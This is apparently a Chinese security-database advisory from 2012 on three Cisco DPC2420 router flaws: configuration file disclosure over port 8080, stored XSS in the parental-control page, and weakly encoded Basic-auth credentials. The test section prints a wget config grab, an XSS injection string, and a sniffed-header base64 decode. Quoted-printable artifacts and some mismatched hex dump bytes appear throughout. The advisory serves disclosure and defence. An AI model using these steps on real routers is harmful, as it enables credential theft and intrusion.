Cisco DPC2420模块配置文件泄露/持续性XSS/身份验证弱加密漏洞

Cisco DPC2420模块配置文件泄露/持续性XSS/身份验证弱加密漏洞

发布日期：2012-12-09
更新日期：2012-12-12

受影响系统：
Cisco DPC2420 D2425-P10-13-v202r12811-110511
Cisco DPC2420
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 56868

Cisco DPC2420是一款无线路由器产品。

Cisco DPC2420在实现上存在配置文件泄露/持续性XSS/身份验证弱加密漏洞，成功利用后可允许攻击者在受影响浏览器内执行任意HTML和脚本代码。

1）一些ISP会通过TCP 8080端口对路由器的配置进行修改。如果启用了远程配置选项并且端口没有过滤，远程攻击者能够获取配置文件信息。

2）通过有效的用户Web界面管理和配置权限，攻击者可插入任意JS代码，造成持续性XSS。

3）通过ARP污染攻击，攻击者可通过Web接口获取路由器登录凭证，然后将Base64编码的密码转换为明文。

<*来源：Facundo M. de la Cruz （fmdlc@code4life.com.ar）
 
  链接：http://packetstormsecurity.org/files/118711/CISCO-DPC2420-vulnerabilities.txt
        http://seclists.org/fulldisclosure/2012/Dec/106?utm_source=twitterfeed&utm_medium=twitter
        http://www.exploit-db.com/exploits/23250/
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

1)配置文件泄露
$ wget http://foobar:8080/filename.gwc -O filename.gwc=20
- --2012-12-08 21:24:43--  http://foobar:8080/filename.gwc
Connecting to foobar:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/octet-stream Content-transfer-encoding: bi=
nary]
Saving to: =E2=80=9Cfilename.gwc=E2=80=9D

    [  <=3D>                                                          ] 15,=
927      50.9K/s  in 0.3s  =20

2012-12-08 21:24:43 (50.9 KB/s) - =E2=80=9Cfilename.gwc=E2=80=9D saved [159=
27]

$ head -n 10 filename.gwc=20
CRCVALUE=3D4144540802;
#<<Begin of Configuration File>>
Version=3D1.1;
Created Date=3D2012/12/8;
Created Time=3D21:24:43;
Model Number=3DDPC2420;
Serial Number=3D234905123;
User Password=3Dky3gUCBmdwbaviPW5GxMZ8vdgzHjvS3wKfdF2Lhbdwq+S6qn+1fvgs54YBw=
l0jX2glgaQuXx27Eo3FgAz5E1N7bk9yR
7hDbzGS+y7XY4jJjY5yin5SkqAQp9GJl/sZO4t4D7TJzy2oV43flEwmdIPkyJC74zTOYZhb24UL=
Jz3HV6ci5wn3gMPi0rSTkUc3pzHdiK
WMMAsuMrYBi5MU9yqZ1vhCfC/c2Is1xgU1Kq0Y1Wcn2LdmRFU6+7rjRuN6iisAQZRQcF/kiym5V=
ewYRBbnRNKjMXC0fw+M9y4V7Y8S4B6
3XuEwcq3OPUSLWKaA6yPDN5e5ZNxwJJuxldirDXBg=3D=3D;

2）持续性XSS
成功访问路由器Web管理和配置界面的合法用户，可以向页面中插入JS代码造成XSS。
例如，向页面http://192.168.0.1/RgParentalBasic.asp添加一条规则：
"'/><script>alert(1</script>.

可参考：http://tty0.code4life.com.ar/CISCO-DPC2420-XSS.png

3)身份验证弱加密

20:58:47.879985 IP 172.16.1.242.34464 > 192.168.0.1.http: Flags [P.], seq 0=
:372, ack 1, win 115

        0x0000:  4500 01a8 fdf4 4000 4006 ccaf ac10 01f2  E.....@.@.......
        0x0010:  c0a8 0001 86a0 0050 e4cf 13e5 76c7 819e  .......P....v...
        0x0020:  8018 0073 03c2 0000 0101 080a 055f ee19  ...s........._..
        0x0030:  0000 be7e 4745 5420 2f73 6967 6e61 6c2e  ...~GET./signal.
        0x0040:  6173 7020 4854 5450 2f31 2e31 0d0a 486f  asp.HTTP/1.1..Ho
        0x0050:  7374 3a20 3139 322e 3136 382e 302e 310d  st:.192.168.0.1.
        0x0060:  0a55 7365 722d 4167 656e 743a 204d 6f7a  .User-Agent:.Moz
        0x0070:  696c 6c61 2f35 2e30 2028 5831 313b 204c  illa/5.0.(X11;.L
        0x0080:  696e 7578 2078 3836 5f36 343b 2072 763a  inux.x86_64;.rv:
        0x0090:  3136 2e30 2920 4765 636b 6f2f 3230 3130  16.0).Gecko/2010
        0x00a0:  3031 3031 2046 6972 6566 6f78 2f31 362e  0101.Firefox/16.
        0x00b0:  300d 0a41 6363 6570 743a 2074 6578 742f  0..Accept:.text/
        0x00c0:  6874 6d6c 2c61 7070 6c69 6361 7469 6f6e  html,application
        0x00d0:  2f78 6874 6d6c 2b78 6d6c 2c61 7070 6c69  /xhtml+xml,appli
        0x00e0:  6361 7469 6f6e 2f78 6d6c 3b71 3d30 2e39  cation/xml;q=3D0.=
9
        0x00f0:  2c2a 2f2a 3b71 3d30 2e38 0d0a 4163 6365  ,*/*;q=3D0.8..Acc=
e
        0x0100:  7074 2d4c 616e 6775 6167 653a 2065 6e2d  pt-Language:.en-
        0x0110:  5553 2c65 6e3b 713d 302e 350d 0a41 6363  US,en;q=3D0.5..Ac=
c
        0x0120:  6570 742d 456e 636f 6469 6e67 3a20 677a  ept-Encoding:.gz
        0x0130:  6970 2c20 6465 666c 6174 650d 0a43 6f6e  ip,.deflate..Con
        0x0140:  6e65 6374 696f 6e3a 206b 6565 702d 616c  nection:.keep-al
        0x0150:  6976 650d 0a52 6566 6572 6572 3a20 6874  ive..Referer:.ht
        0x0160:  7470 3a2f 2f31 3932 2e31 3638 2e30 2e31  tp://192.168.0.1
        0x0170:  2f77 6562 7374 6172 2e68 746d 6c0d 0a41  /webstar.html..A
        0x0180:  7574 686f 7269 7a61 7469 6f6e 3a20 4261  uthorization:.Ba
        0x0190:  7369 6320 4f6b 4d30 626d fa38 3443 a9c0  sic.aWFtYXBhc3N3
        0x01a0:  1b4e 1134 640a 054b 

$ echo aWFtYXBhc3N3ZAo=3D=3D | base64 -d
iamapassword

建议：
--------------------------------------------------------------------------------
厂商补丁：

Cisco
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.cisco.com/warp/public/707/advisory.html